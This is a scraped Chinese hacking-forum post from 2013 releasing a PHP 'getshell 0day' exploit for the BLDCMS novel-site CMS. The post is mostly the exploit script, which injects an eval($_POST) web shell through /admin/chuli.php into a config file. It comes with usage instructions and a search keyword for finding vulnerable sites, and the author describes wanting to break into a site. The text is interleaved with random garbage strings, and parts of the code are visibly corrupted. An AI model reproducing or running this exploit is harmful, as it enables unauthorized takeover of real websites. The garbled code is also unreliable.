中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]
作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
% O# r  S) w. w) y+ Z3 a7 T
% L& `1 N$ h5 y0 e- }1 Z8 z 1 a0 R0 ?/ {1 |" W5 T7 K7 B
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
4 c% G" I6 J( E9 x& `6 Q ) A9 t& R' y& k3 f
既然都有人发了 我就把我之前写好的EXP放出来吧" z3 s5 p" s9 \* o+ h9 g

$ Q( F! q, j- {( Pview source print?01.php;">
# g' R' n- Z( b" N& _02.<!--?php$ I7 k1 Z& I) l' [7 @* i; }2 a4 s
03.echo "-------------------------------------------------------------------
' b$ U6 Y3 c- u04.
3 C8 Q. I$ L; d( ?6 Q05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP" N9 G0 v3 D# `5 ^" b
06.
1 Y+ \: T# L: p0 e- D. H2 f, T07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
% _9 D6 {5 N1 [; J+ [: E7 A08.
" R7 \" b. f: ^( ?1 o( I! Z# m09.QQ:981009941\r\n                                2013.3.21\r\n            
7 j& X6 R& ?- x( w10. 4 o+ S* V- b9 H, K4 F- t
11.
4 \4 ?( y1 A; V( b* k12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码5 k% o! z  I* l! a5 j" {9 n
13. 0 o+ t9 T  i. v% b9 j
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n------------ o3 \! l4 i; e0 }3 z; X6 V5 K
15.
+ m$ s7 \4 E7 j0 I* @: g16.--------------------------------------------------------------------\r\n";
/ R1 E% V7 ~/ h( C( a" e17.$url=$argv[1];
; f# @- Q1 J8 B- _18.$dir=$argv[2];
8 l7 x$ H/ k5 y' }; u- H/ Z19.$pass=$argv[3];8 {; `8 i1 }7 B, w& Y" c, |, S  c
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" Z( w, m" F% F7 b, J
21.if (emptyempty($pass)||emptyempty($url))  Q4 \3 U2 O. j4 [) R
22.{exit("请输入参数");}4 k/ K2 k( i4 J
23.else( c2 ~" q* c4 T! p, Q; M' U5 R
24.{
1 U' \$ n; l4 O  L* @25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
% |) E4 ?4 u( ~1 |26.
# R; v4 G! R, c$ C5 F- `  R* E6 ?8 o27.al;
2 T: _5 t* D& _! B28.$length = strlen($fuckdata);
1 Y% D! L% s  ~  n+ w29.function getshell($url,$pass)
+ [$ E0 w$ b7 w' z% b, ]3 u, m30.{
: C* N1 u+ \& D2 f! B' F! @5 q31.global $url,$dir,$pass,$eval,$length,$fuckdata;: E5 ?, ?* P  Q1 e
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";' @4 P: G- J8 o! ^3 o1 m9 t; ~
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";* a- V- Y/ U! N4 H( k8 O1 ^
34.$header .= "User-Agent: MSIE\r\n";$ N& ~$ j3 c. I0 Q0 d/ x" O
35.$header .= "Host:".$url."\r\n";# t* k2 K' {* M% a: B* k* l/ g4 C
36.$header .= "Content-Length: ".$length."\r\n";
( p, V0 Z) v" G. D  M& l/ o37.$header .= "Connection: Close\r\n";
) a6 x3 f4 `5 Y0 C6 [38.$header .="\r\n";+ f- D( U5 m# {$ f7 j8 j$ h
39.$header .= $fuckdata."\r\n\r\n";
# e: a* C. D6 T+ K40.$fp = fsockopen($url, 80,$errno,$errstr,15);/ o: k, h- {4 ?: {$ R/ a( e
41.if (!$fp)
) I3 i+ w$ ~- f6 j42.{
1 b: w$ l0 F8 d5 K43.exit ("利用失败:请检查指定目标是否能正常打开");" I. I* X9 |4 p+ X( p* ?
44.}
9 L& b- C* T. }# |45.else{ if (!fputs($fp,$header))
; f3 Q  D7 u0 {# W9 m46.{exit ("利用失败");}. Z3 n" z: n  A
47.else
/ e: a( @7 v# Y8 E9 y1 V) @  o* _4 k, ^48.{
/ r! c- M$ z; Y* T) Q* Y49.$receive = '';6 K# j/ i* \- k) D  u' |4 t0 f
50.while (!feof($fp)) {8 x0 s) t8 s+ _7 R3 V
51.$receive .= @fgets($fp, 1000);
) }  q$ ]( ?8 `/ f8 ~0 X52.}
; A; D( j) N. I5 R" y3 u' H53.@fclose($fp);
# J, {1 E  D" M  i9 X54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标) O4 W/ s) Q" s
55. # ]; Y) v2 A6 S: W
56.GPC是否=off)";0 Q1 ?! l. h: M. K. f4 q$ V0 A
57.}}
9 H( V: ^9 r$ m9 `, f2 i& N- j58.}
& w. l" x6 r& \0 A, e( [8 M+ c6 N59.}8 r$ i9 w! K+ x& _6 ]2 v0 _
60.getshell($url,$pass);
& c8 r2 l/ X/ j. C3 O61.?-->
4 t- y! g: }4 M: u: @
1 l! b  A* S0 n7 q0 M
. D1 I1 p; l6 @/ o1 I
( k6 m# ^" g4 Y$ `- U7 cby 数据流
9 _, p, b# n, g6 X5 c



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2